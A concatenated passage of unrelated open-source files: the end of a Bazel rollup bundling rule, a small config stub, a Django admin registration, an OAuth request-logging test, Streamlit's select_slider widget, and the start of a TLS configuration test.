"src/hello-world/hello-world.module.ngfactory",
"src/todos/todos.module.ngfactory",
],
entry_point = "src/main.prod",
deps = ["//src"],
)
```
In this case, the main_entry_point_dirname will evaluate to
`src/` and this will be stripped from the entry points for
the map. If folder is `bundle_chunks`, the generated SystemJS
boilerplate/entry point file will look like:
```
(function(global) {
System.config({
packages: {
'': {map: {
"./main.prod": "bundle_chunks/main.prod",
"./hello-world/hello-world.module.ngfactory": "bundle_chunks/hello-world.module.ngfactory",
"./todos/todos.module.ngfactory": "bundle_chunks/todos.module.ngfactory"},
defaultExtension: 'js'},
}
});
System.import('main.prod').catch(function(err) {
console.error(err);
});
})(this);
```
Args:
ctx: bazel rule execution context
bundles_folder: the folder name with the bundled chunks to map to
output: the file to generate
"""
entry_point_path = _entry_point_path(ctx)
main_entry_point_basename = entry_point_path.split("/")[-1] + ".js"
main_entry_point_dirname = "/".join(entry_point_path.split("/")[:-1]) + "/"
entry_points = {}
for e in [entry_point_path] + ctx.attr.additional_entry_points:
entry_point = e[len(main_entry_point_dirname):]
entry_points["./" + entry_point] = bundles_folder + "/" + entry_point.split("/")[-1]
ctx.actions.expand_template(
output = output,
template = ctx.file._system_config_tmpl,
substitutions = {
"TMPL_entry_points": str(entry_points),
"TMPL_main_entry_point": main_entry_point_basename,
},
)
def _rollup_bundle(ctx):
if len(ctx.attr.entry_point.files.to_list()) != 1:
fail("labels in entry_point must contain exactly one file")
if ctx.attr.additional_entry_points:
# Generate code split bundles if additional entry points have been specified.
# See doc for additional_entry_points for more information.
# Note: "_chunks" is needed on the output folders since ctx.label.name + ".es2015" is already
# a folder that contains the re-rooted es2015 sources
rollup_config = write_rollup_config(ctx, output_format = "es", additional_entry_points = ctx.attr.additional_entry_points)
code_split_es2015_output_dir = ctx.actions.declare_directory(ctx.label.name + "_chunks_es2015")
_run_rollup(ctx, _collect_es2015_sources(ctx), rollup_config, code_split_es2015_output_dir)
code_split_es2015_min_output_dir = ctx.actions.declare_directory(ctx.label.name + "_chunks_min_es2015")
_run_terser(ctx, code_split_es2015_output_dir, code_split_es2015_min_output_dir, None)
code_split_es2015_min_debug_output_dir = ctx.actions.declare_directory(ctx.label.name + "_chunks_min_debug_es2015")
_run_terser(ctx, code_split_es2015_output_dir, code_split_es2015_min_debug_output_dir, None, debug = True)
code_split_es5_output_dir = ctx.actions.declare_directory(ctx.label.name + "_chunks")
_run_tsc_on_directory(ctx, code_split_es2015_output_dir, code_split_es5_output_dir)
code_split_es5_min_output_dir = ctx.actions.declare_directory(ctx.label.name + "_chunks_min")
_run_terser(ctx, code_split_es5_output_dir, code_split_es5_min_output_dir, None)
code_split_es5_min_debug_output_dir = ctx.actions.declare_directory(ctx.label.name + "_chunks_min_debug")
_run_terser(ctx, code_split_es5_output_dir, code_split_es5_min_debug_output_dir, None, debug = True)
# Generate the SystemJS boilerplate/entry point files
_generate_toplevel_entry(ctx, ctx.label.name + "_chunks_es2015", ctx.outputs.build_es2015)
_generate_toplevel_entry(ctx, ctx.label.name + "_chunks_min_es2015", ctx.outputs.build_es2015_min)
_generate_toplevel_entry(ctx, ctx.label.name + "_chunks_min_debug_es2015", ctx.outputs.build_es2015_min_debug)
_generate_code_split_entry(ctx, ctx.label.name + "_chunks", ctx.outputs.build_es5)
_generate_code_split_entry(ctx, ctx.label.name + "_chunks_min", ctx.outputs.build_es5_min)
_generate_code_split_entry(ctx, ctx.label.name + "_chunks_min_debug", ctx.outputs.build_es5_min_debug)
# There is no UMD/CJS bundle when code-splitting but we still need to satisfy the output
_generate_code_split_entry(ctx, ctx.label.name + "_chunks", ctx.outputs.build_umd)
_generate_code_split_entry(ctx, ctx.label.name + "_chunks", ctx.outputs.build_umd_min)
_generate_code_split_entry(ctx, ctx.label.name + "_chunks", ctx.outputs.build_cjs)
_generate_code_split_entry(ctx, ctx.label.name + "_chunks", ctx.outputs.build_es5_umd)
_generate_code_split_entry(ctx, ctx.label.name + "_chunks", ctx.outputs.build_es5_umd_min)
# There is no source map explorer output when code-splitting but we still need to satisfy the output
ctx.actions.expand_template(
output = ctx.outputs.explore_html,
template = ctx.file._no_explore_html,
substitutions = {},
)
files = [
ctx.outputs.build_es2015,
ctx.outputs.build_es2015_min,
ctx.outputs.build_es2015_min_debug,
ctx.outputs.build_es5,
ctx.outputs.build_es5_min,
ctx.outputs.build_es5_min_debug,
code_split_es2015_output_dir,
code_split_es2015_min_output_dir,
code_split_es2015_min_debug_output_dir,
code_split_es5_output_dir,
code_split_es5_min_output_dir,
code_split_es5_min_debug_output_dir,
]
output_group = OutputGroupInfo(
es2015 = depset([ctx.outputs.build_es2015, code_split_es2015_output_dir]),
es2015_min = depset([ctx.outputs.build_es2015_min, code_split_es2015_min_output_dir]),
es2015_min_debug = depset([ctx.outputs.build_es2015_min_debug, code_split_es2015_min_debug_output_dir]),
es5 = depset([ctx.outputs.build_es5, code_split_es5_output_dir]),
es5_min = depset([ctx.outputs.build_es5_min, code_split_es5_min_output_dir]),
es5_min_debug = depset([ctx.outputs.build_es5_min_debug, code_split_es5_min_debug_output_dir]),
)
else:
# Generate the bundles
rollup_config = write_rollup_config(ctx)
es2015_map = run_rollup(ctx, _collect_es2015_sources(ctx), rollup_config, ctx.outputs.build_es2015)
es2015_min_map = run_terser(ctx, ctx.outputs.build_es2015, ctx.outputs.build_es2015_min, config_name = ctx.label.name + "es2015_min", in_source_map = es2015_map)
es2015_min_debug_map = run_terser(ctx, ctx.outputs.build_es2015, ctx.outputs.build_es2015_min_debug, debug = True, config_name = ctx.label.name + "es2015_min_debug", in_source_map = es2015_map)
_run_tsc(ctx, ctx.outputs.build_es2015, ctx.outputs.build_es5)
es5_min_map = run_terser(ctx, ctx.outputs.build_es5, ctx.outputs.build_es5_min)
es5_min_debug_map = run_terser(ctx, ctx.outputs.build_es5, ctx.outputs.build_es5_min_debug, debug = True)
cjs_rollup_config = write_rollup_config(ctx, filename = "_%s_cjs.rollup.conf.js", output_format = "cjs")
cjs_map = run_rollup(ctx, _collect_es2015_sources(ctx), cjs_rollup_config, ctx.outputs.build_cjs)
umd_rollup_config = write_rollup_config(ctx, filename = "_%s_umd.rollup.conf.js", output_format = "umd")
umd_map = run_rollup(ctx, _collect_es2015_sources(ctx), umd_rollup_config, ctx.outputs.build_umd)
umd_min_map = run_terser(ctx, ctx.outputs.build_umd, ctx.outputs.build_umd_min, config_name = ctx.label.name + "umd_min", in_source_map = umd_map)
_run_tsc(ctx, ctx.outputs.build_umd, ctx.outputs.build_es5_umd)
es5_umd_min_map = run_terser(ctx, ctx.outputs.build_es5_umd, ctx.outputs.build_es5_umd_min, config_name = ctx.label.name + "es5umd_min")
run_sourcemapexplorer(ctx, ctx.outputs.build_es5_min, es5_min_map, ctx.outputs.explore_html)
files = [ctx.outputs.build_es5_min, es5_min_map]
output_group = OutputGroupInfo(
cjs = depset([ctx.outputs.build_cjs, cjs_map]),
es2015 = depset([ctx.outputs.build_es2015, es2015_map]),
es2015_min = depset([ctx.outputs.build_es2015_min, es2015_min_map]),
es2015_min_debug = depset([ctx.outputs.build_es2015_min_debug, es2015_min_debug_map]),
es5 = depset([ctx.outputs.build_es5]),
es5_min = depset([ctx.outputs.build_es5_min, es5_min_map]),
es5_min_debug = depset([ctx.outputs.build_es5_min_debug, es5_min_debug_map]),
es5_umd = depset([ctx.outputs.build_es5_umd]),
es5_umd_min = depset([ctx.outputs.build_es5_umd_min, es5_umd_min_map]),
umd = depset([ctx.outputs.build_umd, umd_map]),
umd_min = depset([ctx.outputs.build_umd_min, umd_min_map]),
)
return [
DefaultInfo(
files = depset(files),
# NB: we don't include any runfiles here since they would always be built
# regardless if they are requested or not
),
output_group,
]
# Expose our list of aspects so derivative rules can override the deps attribute and
# add their own additional aspects.
# If users are in a different repo and load the aspect themselves, they will create
# different Provider symbols (e.g. NodeModuleInfo) and we won't find them.
# So users must use these symbols that are load'ed in rules_nodejs.
ROLLUP_DEPS_ASPECTS = [rollup_module_mappings_aspect, collect_node_modules_aspect]
ROLLUP_ATTRS = {
"srcs": attr.label_list(
doc = """JavaScript source files from the workspace.
These can use ES2015 syntax and ES Modules (import/export)""",
allow_files = [".js"],
),
"additional_entry_points": attr.string_list(
doc = """Additional entry points of the application for code splitting, passed as the input to rollup.
These should be a path relative to the workspace root.
When additional_entry_points are specified, rollup_bundle
will split the bundle in multiple entry points and chunks.
There will be a main entry point chunk as well as entry point
chunks for each additional_entry_point. The file names
of these entry points will correspond to the file names
specified in entry_point and additional_entry_points.
There will also be one or more common chunks that are shared
between entry points named chunk-<HASH>.js. The number
of common chunks is variable depending on the code being
bundled.
Entry points and chunks will be outputted to folders:
- <label-name>_chunks_es2015 // es2015
- <label-name>_chunks // es5
- <label-name>_chunks_min // es5 minified
- <label-name>_chunks_min_debug // es5 minified debug
The following files will be outputted that contain the
SystemJS boilerplate to map the entry points to their file
names and load the main entry point:
flavors:
- <label-name>.es2015.js // es2015 with EcmaScript modules
- <label-name>.js // es5 syntax with CJS modules
- <label-name>.min.js // es5 minified
- <label-name>.min_debug.js // es5 minified debug
NOTE: additional_entry_points MUST be in the same folder or deeper than
the main entry_point for the SystemJS boilerplate/entry point to
be valid. For example, if the main entry_point is
`src/main` then all additional_entry_points must be under
`src/**` such as `src/bar` or `src/foo/bar`. Alternate
additional_entry_points configurations are valid but the
SystemJS boilerplate/entry point files will not be usable and
it is up to the user in these cases to handle the SystemJS
boilerplate manually.
It is sufficient to load one of these SystemJS boilerplate/entry point
files as a script in your HTML to load your application""",
),
"entry_point": attr.label(
doc = """The starting point of the application, passed as the `--input` flag to rollup.
If the entry JavaScript file belongs to the same package (as the BUILD file),
you can simply reference it by its relative name to the package directory:
```
rollup_bundle(
name = "bundle",
entry_point = ":main.js",
)
```
You can specify the entry point as a typescript file so long as you also include
the ts_library target in deps:
```
ts_library(
name = "main",
srcs = ["main.ts"],
)
rollup_bundle(
name = "bundle",
deps = [":main"]
entry_point = ":main.ts",
)
```
The rule will use the corresponding `.js` output of the ts_library rule as the entry point.
If the entry point target is a rule, it should produce a single JavaScript entry file that will be passed to the nodejs_binary rule.
For example:
```
filegroup(
name = "entry_file",
srcs = ["main.js"],
)
rollup_bundle(
name = "bundle",
entry_point = ":entry_file",
)
```
""",
mandatory = True,
allow_single_file = True,
),
"global_name": attr.string(
doc = """A name given to this package when referenced as a global variable.
This name appears in the bundle module incantation at the beginning of the file,
and governs the global symbol added to the global context (e.g. `window`) as a side-
effect of loading the UMD/IIFE JS bundle.
Rollup doc: "The variable name, representing your iife/umd bundle, by which other scripts on the same page can access it."
This is passed to the `output.name` setting in Rollup.""",
),
"globals": attr.string_dict(
doc = """A dict of symbols that reference external scripts.
The keys are variable names that appear in the program,
and the values are the symbol to reference at runtime in a global context (UMD bundles).
For example, a program referencing @angular/core should use ng.core
as the global reference, so Angular users should include the mapping
`"@angular/core":"ng.core"` in the globals.""",
default = {},
),
"license_banner": attr.label(
doc = """A .txt file passed to the `banner` config option of rollup.
The contents of the file will be copied to the top of the resulting bundles.
Note that you can replace a version placeholder in the license file, by using
the special version `0.0.0-PLACEHOLDER`. See the section on stamping in the README.""",
allow_single_file = [".txt"],
),
"node_modules": attr.label(
doc = """Dependencies from npm that provide some modules that must be
resolved by rollup.
This attribute is DEPRECATED. As of version 0.13.0 the recommended approach
to npm dependencies is to use fine grained npm dependencies which are setup
with the `yarn_install` or `npm_install` rules. For example, in a rollup_bundle
target that used the `node_modules` attribute,
```
rollup_bundle(
name = "bundle",
...
node_modules = "//:node_modules",
)
```
which specifies all files within the `//:node_modules` filegroup
to be inputs to the `bundle`. Using fine grained npm dependencies,
`bundle` is defined with only the npm dependencies that are
needed:
```
rollup_bundle(
name = "bundle",
...
deps = [
"@npm//foo",
"@npm//bar",
...
],
)
```
In this case, only the `foo` and `bar` npm packages and their
transitive deps are includes as inputs to the `bundle` target
which reduces the time required to setup the runfiles for this
target (see https://github.com/bazelbuild/bazel/issues/5153).
The @npm external repository and the fine grained npm package
targets are setup using the `yarn_install` or `npm_install` rule
in your WORKSPACE file:
yarn_install(
name = "npm",
package_json = "//:package.json",
yarn_lock = "//:yarn.lock",
)
""",
default = Label("//:node_modules_none"),
),
"deps": attr.label_list(
doc = """Other rules that produce JavaScript outputs, such as `ts_library`.""",
aspects = ROLLUP_DEPS_ASPECTS,
),
"_no_explore_html": attr.label(
default = Label("@build_bazel_rules_nodejs//internal/rollup:no_explore.html"),
allow_single_file = True,
),
"_rollup": attr.label(
executable = True,
cfg = "host",
default = Label("@build_bazel_rules_nodejs//internal/rollup:rollup"),
),
"_rollup_config_tmpl": attr.label(
default = Label("@build_bazel_rules_nodejs//internal/rollup:rollup.config.js"),
allow_single_file = True,
),
"_source_map_explorer": attr.label(
executable = True,
cfg = "host",
default = Label("@build_bazel_rules_nodejs//internal/rollup:source-map-explorer"),
),
"_system_config_tmpl": attr.label(
default = Label("@build_bazel_rules_nodejs//internal/rollup:system.config.js"),
allow_single_file = True,
),
"_terser_wrapped": attr.label(
executable = True,
cfg = "host",
default = Label("@build_bazel_rules_nodejs//internal/rollup:terser-wrapped"),
),
"_tsc": attr.label(
executable = True,
cfg = "host",
default = Label("@build_bazel_rules_nodejs//internal/rollup:tsc"),
),
"_tsc_directory": attr.label(
executable = True,
cfg = "host",
default = Label("@build_bazel_rules_nodejs//internal/rollup:tsc-directory"),
),
}
ROLLUP_OUTPUTS = {
"build_cjs": "%{name}.cjs.js",
"build_es2015": "%{name}.es2015.js",
"build_es2015_min": "%{name}.min.es2015.js",
"build_es2015_min_debug": "%{name}.min_debug.es2015.js",
"build_es5": "%{name}.js",
"build_es5_min": "%{name}.min.js",
"build_es5_min_debug": "%{name}.min_debug.js",
"build_es5_umd": "%{name}.es5umd.js",
"build_es5_umd_min": "%{name}.min.es5umd.js",
"build_umd": "%{name}.umd.js",
"build_umd_min": "%{name}.min.umd.js",
"explore_html": "%{name}.explore.html",
}
rollup_bundle = rule(
implementation = _rollup_bundle,
attrs = ROLLUP_ATTRS,
outputs = ROLLUP_OUTPUTS,
)
"""Produces several bundled JavaScript files using Rollup and terser.
Load it with
`load("@build_bazel_rules_nodejs//:defs.bzl", "rollup_bundle")`
It performs this work in several separate processes:
1. Call rollup on the original sources
2. Downlevel the resulting code to es5 syntax for older browsers
3. Minify the bundle with terser, possibly with pretty output for human debugging.
The default output of a `rollup_bundle` rule is the non-debug-minified es5 bundle.
However you can request one of the other outputs with a dot-suffix on the target's name.
For example, if your `rollup_bundle` is named `my_rollup_bundle`, you can use one of these labels:
To request the ES2015 syntax (e.g. `class` keyword) without downleveling or minification, use the `:my_rollup_bundle.es2015.js` label.
To request the ES5 downleveled bundle without minification, use the `:my_rollup_bundle.js` label
To request the debug-minified es5 bundle, use the `:my_rollup_bundle.min_debug.js` label.
To request a UMD-bundle, use the `:my_rollup_bundle.umd.js` label.
To request a CommonJS bundle, use the `:my_rollup_bundle.cjs.js` label.
You can also request an analysis from source-map-explorer by buildng the `:my_rollup_bundle.explore.html` label.
However this is currently broken for `rollup_bundle` ES5 mode because we use tsc for downleveling and
it doesn't compose the resulting sourcemaps with an input sourcemap.
See https://github.com/bazelbuild/rules_nodejs/issues/175
For debugging, note that the `rollup.config.js` and `terser.config.json` files can be found in the bazel-bin folder next to the resulting bundle.
An example usage can be found in https://github.com/bazelbuild/rules_nodejs/tree/master/internal/e2e/rollup
"""
# Adding the above docstring as `doc` attribute
# causes a build error but ONLY on Ubuntu 14.04 on BazelCI.
# ```
# File "internal/npm_package/npm_package.bzl", line 221, in <module>
# outputs = NPM_PACKAGE_OUTPUTS,
# TypeError: rule() got an unexpected keyword argument 'doc'
# ```
# This error does not occur on any other platform on BazelCI including Ubuntu 16.04.
# TOOD(gregmagolan): Figure out why and/or file a bug to Bazel
# See https://github.com/bazelbuild/buildtools/issues/471#issuecomment-485283200
|
py | b414b2f944365729384c6c85b2c3aeedd030ff75 | apiKey = ''
apiSecretKey = ''
markets = {'BTC' : 'hoard', 'ETH' : 'hoard'}
tradeAmount = 100.0
|
py | b414b47de56f2047a1e268d101e4174811720390 | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from .models import User
admin.site.register(User, UserAdmin)
|
py | b414b555cfc6d52887267a60e8de1a3cef44712a | # Copyright 2021 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
try:
from StringIO import StringIO
except ModuleNotFoundError:
from io import StringIO
from django.test import TestCase
from django.conf import settings
from spotseeker_server.models import Spot, TrustedOAuthClient
from django.test.client import Client
import re
import simplejson as json
import logging
import hashlib
import time
import random
from oauth_provider.models import Consumer
from django.test.utils import override_settings
from mock import patch
from spotseeker_server import models
from oauthlib import oauth1
@override_settings(
SPOTSEEKER_SPOT_FORM="spotseeker_server.default_forms."
"spot.DefaultSpotForm",
SPOTSEEKER_SPOTEXTENDEDINFO_FORM="spotseeker_server.default_forms."
"spot.DefaultSpotExtendedInfoForm",
SPOTSEEKER_AUTH_ADMINS=("pmichaud",),
)
class SpotAuthOAuthLogger(TestCase):
@classmethod
def setUpTestData(self):
spot = Spot.objects.create(
name="This is for testing the oauth module", capacity=10
)
self.spot = spot
self.url = "/api/v1/spot/%s" % self.spot.pk
def setUp(self):
new_middleware = []
has_logger = False
self.original_middleware = settings.MIDDLEWARE
for middleware in settings.MIDDLEWARE:
new_middleware.append(middleware)
if middleware == "spotseeker_server.logger.oauth.LogMiddleware":
has_logger = True
if not has_logger:
new_middleware.append(
"spotseeker_server.logger.oauth.LogMiddleware"
)
settings.MIDDLEWARE = new_middleware
self.stream = StringIO()
self.handler = logging.StreamHandler(self.stream)
self.log = logging.getLogger("spotseeker_server.logger.oauth")
self.log.setLevel(logging.INFO)
for handler in self.log.handlers:
self.log.removeHandler(handler)
self.log.addHandler(self.handler)
def test_log_value_2_legged(self):
with self.settings(
SPOTSEEKER_AUTH_MODULE="spotseeker_server.auth.oauth"
):
consumer_name = "Test consumer"
key = hashlib.sha1(
"{0} - {1}".format(random.random(), time.time()).encode(
"utf-8"
)
).hexdigest()
secret = hashlib.sha1(
"{0} - {1}".format(random.random(), time.time()).encode(
"utf-8"
)
).hexdigest()
create_consumer = Consumer.objects.create(
name=consumer_name, key=key, secret=secret
)
client = oauth1.Client(key, client_secret=secret)
_, headers, _ = client.sign(
"http://testserver/api/v1/spot/%s" % self.spot.pk
)
response = Client().get(
self.url, HTTP_AUTHORIZATION=headers["Authorization"]
)
with self.settings(
SPOTSEEKER_AUTH_MODULE="spotseeker_server.auth.all_ok"
):
self.handler.flush()
log_message = self.stream.getvalue()
matches = re.search(
r'\[.*?\] ([\d]+)\t"(.*?)"\t-\t"GET /api'
r'/v1/spot/([\d]+)" ([\d]+) ([\d]+)',
log_message,
)
consumer_id = int(matches.group(1))
consumer_name = matches.group(2)
spot_id = int(matches.group(3))
status_code = int(matches.group(4))
response_size = int(matches.group(5))
self.assertEquals(
consumer_id, create_consumer.pk, "Logging correct consumer PK"
)
self.assertEquals(
consumer_name,
create_consumer.name,
"Logging correct consumer name",
)
self.assertEquals(spot_id, self.spot.pk, "Logging correct uri")
self.assertEquals(
status_code,
response.status_code,
"Logging correct status_code",
)
self.assertEquals(
response_size,
len(response.content.decode()),
"Logging correct content size",
)
def test_log_trusted_3_legged(self):
with self.settings(
SPOTSEEKER_AUTH_MODULE="spotseeker_server.auth.oauth"
):
consumer_name = "Trusted test consumer"
key = hashlib.sha1(
"{0} - {1}".format(random.random(), time.time()).encode(
"utf-8"
)
).hexdigest()
secret = hashlib.sha1(
"{0} - {1}".format(random.random(), time.time()).encode(
"utf-8"
)
).hexdigest()
create_consumer = Consumer.objects.create(
name=consumer_name, key=key, secret=secret
)
trusted_consumer = TrustedOAuthClient.objects.create(
consumer=create_consumer,
is_trusted=True,
bypasses_user_authorization=False,
)
client = oauth1.Client(key, client_secret=secret)
_, headers, _ = client.sign(
"http://testserver/api/v1/spot/%s" % self.spot.pk
)
c = Client()
response = c.get(
self.url, HTTP_AUTHORIZATION=headers["Authorization"]
)
etag = response["ETag"]
spot_dict = json.loads(response.content)
spot_dict["name"] = "Failing to modify oauth"
spot_dict["location"] = {"latitude": 55, "longitude": -30}
response = c.put(
self.url,
json.dumps(spot_dict),
content_type="application/json",
If_Match=etag,
HTTP_AUTHORIZATION=headers["Authorization"],
HTTP_X_OAUTH_USER="pmichaud",
)
self.assertEquals(
response.status_code,
200,
"Accespts a PUT from a trusted oauth client",
)
with self.settings(
SPOTSEEKER_AUTH_MODULE="spotseeker_server.auth.all_ok"
):
self.handler.flush()
log_message = self.stream.getvalue()
matches = re.search(
r'\n\[.*?\] ([\d]+)\t"(.*?)"\t(.*?)\t"PUT /api/v1/spo'
r't/([\d]+)" ([\d]+) ([\d]+)',
log_message,
re.MULTILINE,
)
consumer_id = int(matches.group(1))
consumer_name = matches.group(2)
user_name = matches.group(3)
spot_id = int(matches.group(4))
status_code = int(matches.group(5))
response_size = int(matches.group(6))
self.assertEquals(
consumer_id, create_consumer.pk, "Logging correct consumer PK"
)
self.assertEquals(
consumer_name,
create_consumer.name,
"Logging correct consumer name",
)
self.assertEquals(
user_name, "pmichaud", "Logging correct oauth username"
)
self.assertEquals(spot_id, self.spot.pk, "Logging correct uri")
self.assertEquals(
status_code,
response.status_code,
"Logging correct status_code",
)
self.assertEquals(
response_size,
len(response.content.decode()),
"Logging correct content size",
)
def test_invalid(self):
with self.settings(
SPOTSEEKER_AUTH_MODULE="spotseeker_server.auth.oauth"
):
c = Client()
response = c.get(self.url)
with self.settings(
SPOTSEEKER_AUTH_MODULE="spotseeker_server.auth.all_ok"
):
self.handler.flush()
log_message = self.stream.getvalue()
matches = re.search(
r'\[.*?\] -\t"-"\t-\t"GET /api/v1/spot'
r'/([\d]+)" ([\d]+) ([\d]+)',
log_message,
)
spot_id = int(matches.group(1))
status_code = int(matches.group(2))
response_size = int(matches.group(3))
self.assertEquals(spot_id, self.spot.pk, "Logging correct uri")
self.assertEquals(
status_code,
response.status_code,
"Logging correct status_code",
)
self.assertEquals(
response_size,
len(response.content),
"Logging correct content size",
)
def tearDown(self):
self.log.removeHandler(self.handler)
self.handler.close()
settings.MIDDLEWARE = self.original_middleware
|
py | b414b575ef5af8c78ea3c3c7181182b872671448 | # Copyright 2018-2022 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from textwrap import dedent
from typing import Any, Callable, Optional, cast
import streamlit
from streamlit.errors import StreamlitAPIException
from streamlit.proto.Slider_pb2 import Slider as SliderProto
from streamlit.scriptrunner import ScriptRunContext, get_script_run_ctx
from streamlit.state import (
register_widget,
WidgetArgs,
WidgetCallback,
WidgetKwargs,
)
from streamlit.type_util import Key, OptionSequence, ensure_indexable, to_key
from streamlit.util import index_
from .form import current_form_id
from .utils import check_callback_rules, check_session_state_rules
class SelectSliderMixin:
def select_slider(
self,
label: str,
options: OptionSequence = [],
value: Any = None,
format_func: Callable[[Any], Any] = str,
key: Optional[Key] = None,
help: Optional[str] = None,
on_change: Optional[WidgetCallback] = None,
args: Optional[WidgetArgs] = None,
kwargs: Optional[WidgetKwargs] = None,
*, # keyword-only arguments:
disabled: bool = False,
) -> Any:
"""
Display a slider widget to select items from a list.
This also allows you to render a range slider by passing a two-element
tuple or list as the `value`.
The difference between `st.select_slider` and `st.slider` is that
`select_slider` accepts any datatype and takes an iterable set of
options, while `slider` only accepts numerical or date/time data and
takes a range as input.
Parameters
----------
label : str
A short label explaining to the user what this slider is for.
options : Sequence, numpy.ndarray, pandas.Series, pandas.DataFrame, or pandas.Index
Labels for the slider options. All options will be cast to str
internally by default. For pandas.DataFrame, the first column is
selected.
value : a supported type or a tuple/list of supported types or None
The value of the slider when it first renders. If a tuple/list
of two values is passed here, then a range slider with those lower
and upper bounds is rendered. For example, if set to `(1, 10)` the
slider will have a selectable range between 1 and 10.
Defaults to first option.
format_func : function
Function to modify the display of the labels from the options.
argument. It receives the option as an argument and its output
will be cast to str.
key : str or int
An optional string or integer to use as the unique key for the widget.
If this is omitted, a key will be generated for the widget
based on its content. Multiple widgets of the same type may
not share the same key.
help : str
An optional tooltip that gets displayed next to the select slider.
on_change : callable
An optional callback invoked when this select_slider's value changes.
args : tuple
An optional tuple of args to pass to the callback.
kwargs : dict
An optional dict of kwargs to pass to the callback.
disabled : bool
An optional boolean, which disables the select slider if set to True.
The default is False. This argument can only be supplied by keyword.
Returns
-------
any value or tuple of any value
The current value of the slider widget. The return type will match
the data type of the value parameter.
Examples
--------
>>> color = st.select_slider(
... 'Select a color of the rainbow',
... options=['red', 'orange', 'yellow', 'green', 'blue', 'indigo', 'violet'])
>>> st.write('My favorite color is', color)
And here's an example of a range select slider:
>>> start_color, end_color = st.select_slider(
... 'Select a range of color wavelength',
... options=['red', 'orange', 'yellow', 'green', 'blue', 'indigo', 'violet'],
... value=('red', 'blue'))
>>> st.write('You selected wavelengths between', start_color, 'and', end_color)
.. output::
https://share.streamlit.io/streamlit/docs/main/python/api-examples-source/widget.select_slider.py
height: 450px
"""
ctx = get_script_run_ctx()
return self._select_slider(
label=label,
options=options,
value=value,
format_func=format_func,
key=key,
help=help,
on_change=on_change,
args=args,
kwargs=kwargs,
disabled=disabled,
ctx=ctx,
)
def _select_slider(
self,
label: str,
options: OptionSequence = [],
value: Any = None,
format_func: Callable[[Any], Any] = str,
key: Optional[Key] = None,
help: Optional[str] = None,
on_change: Optional[WidgetCallback] = None,
args: Optional[WidgetArgs] = None,
kwargs: Optional[WidgetKwargs] = None,
disabled: bool = False,
ctx: Optional[ScriptRunContext] = None,
) -> Any:
key = to_key(key)
check_callback_rules(self.dg, on_change)
check_session_state_rules(default_value=value, key=key)
opt = ensure_indexable(options)
if len(opt) == 0:
raise StreamlitAPIException("The `options` argument needs to be non-empty")
is_range_value = isinstance(value, (list, tuple))
def as_index_list(v):
is_range_value = isinstance(v, (list, tuple))
if is_range_value:
slider_value = [index_(opt, val) for val in v]
start, end = slider_value
if start > end:
slider_value = [end, start]
return slider_value
else:
# Simplify future logic by always making value a list
try:
return [index_(opt, v)]
except ValueError:
if value is not None:
raise
return [0]
# Convert element to index of the elements
slider_value = as_index_list(value)
slider_proto = SliderProto()
slider_proto.label = label
slider_proto.format = "%s"
slider_proto.default[:] = slider_value
slider_proto.min = 0
slider_proto.max = len(opt) - 1
slider_proto.step = 1 # default for index changes
slider_proto.data_type = SliderProto.INT
slider_proto.options[:] = [str(format_func(option)) for option in opt]
slider_proto.form_id = current_form_id(self.dg)
if help is not None:
slider_proto.help = dedent(help)
def deserialize_select_slider(ui_value, widget_id=""):
if not ui_value:
# Widget has not been used; fallback to the original value,
ui_value = slider_value
# The widget always returns floats, so convert to ints before indexing
return_value = list(map(lambda x: opt[int(x)], ui_value)) # type: ignore[no-any-return]
# If the original value was a list/tuple, so will be the output (and vice versa)
return tuple(return_value) if is_range_value else return_value[0]
def serialize_select_slider(v):
return as_index_list(v)
current_value, set_frontend_value = register_widget(
"slider",
slider_proto,
user_key=key,
on_change_handler=on_change,
args=args,
kwargs=kwargs,
deserializer=deserialize_select_slider,
serializer=serialize_select_slider,
ctx=ctx,
)
# This needs to be done after register_widget because we don't want
# the following proto fields to affect a widget's ID.
slider_proto.disabled = disabled
if set_frontend_value:
slider_proto.value[:] = serialize_select_slider(current_value)
slider_proto.set_value = True
self.dg._enqueue("slider", slider_proto)
return current_value
@property
def dg(self) -> "streamlit.delta_generator.DeltaGenerator":
"""Get our DeltaGenerator."""
return cast("streamlit.delta_generator.DeltaGenerator", self)
|
py | b414b5a0ed5c9c8b52b9f2d3d3d13eabb231f283 | import ssl
import pytest
from unit.applications.tls import TestApplicationTLS
class TestTLSConfCommand(TestApplicationTLS):
prerequisites = {'modules': {'openssl': 'any'}}
@pytest.fixture(autouse=True)
def setup_method_fixture(self, request):
self.certificate()
assert 'success' in self.conf(
{
"listeners": {
"*:7080": {
"pass": "routes",
"tls": {"certificate": "default"},
}
},
"routes": [{"action": {"return": 200}}],
"applications": {},
}
), 'load application configuration'
def test_tls_conf_command(self):
def check_no_connection():
try:
self.get_ssl()
pytest.fail('Unexpected connection.')
except (ssl.SSLError, ConnectionRefusedError):
pass
# Set one conf_commands (disable protocol).
(resp, sock) = self.get_ssl(start=True)
shared_ciphers = sock.shared_ciphers()
protocols = list(set(c[1] for c in shared_ciphers))
protocol = sock.cipher()[1]
if '/' in protocol:
pytest.skip('Complex protocol format.')
assert 'success' in self.conf(
{
"certificate": "default",
"conf_commands": {"protocol": '-' + protocol},
},
'listeners/*:7080/tls',
), 'protocol disabled'
sock.close()
if len(protocols) > 1:
(resp, sock) = self.get_ssl(start=True)
cipher = sock.cipher()
assert cipher[1] != protocol, 'new protocol used'
shared_ciphers = sock.shared_ciphers()
ciphers = list(set(c for c in shared_ciphers if c[1] == cipher[1]))
sock.close()
else:
check_no_connection()
pytest.skip('One TLS protocol available only.')
# Set two conf_commands (disable protocol and cipher).
assert 'success' in self.conf(
{
"certificate": "default",
"conf_commands": {
"protocol": '-' + protocol,
"cipherstring": cipher[1] + ":!" + cipher[0],
},
},
'listeners/*:7080/tls',
), 'cipher disabled'
if len(ciphers) > 1:
(resp, sock) = self.get_ssl(start=True)
cipher_new = sock.cipher()
assert cipher_new[1] == cipher[1], 'previous protocol used'
assert cipher_new[0] != cipher[0], 'new cipher used'
sock.close()
else:
check_no_connection()
def test_tls_conf_command_invalid(self, skip_alert):
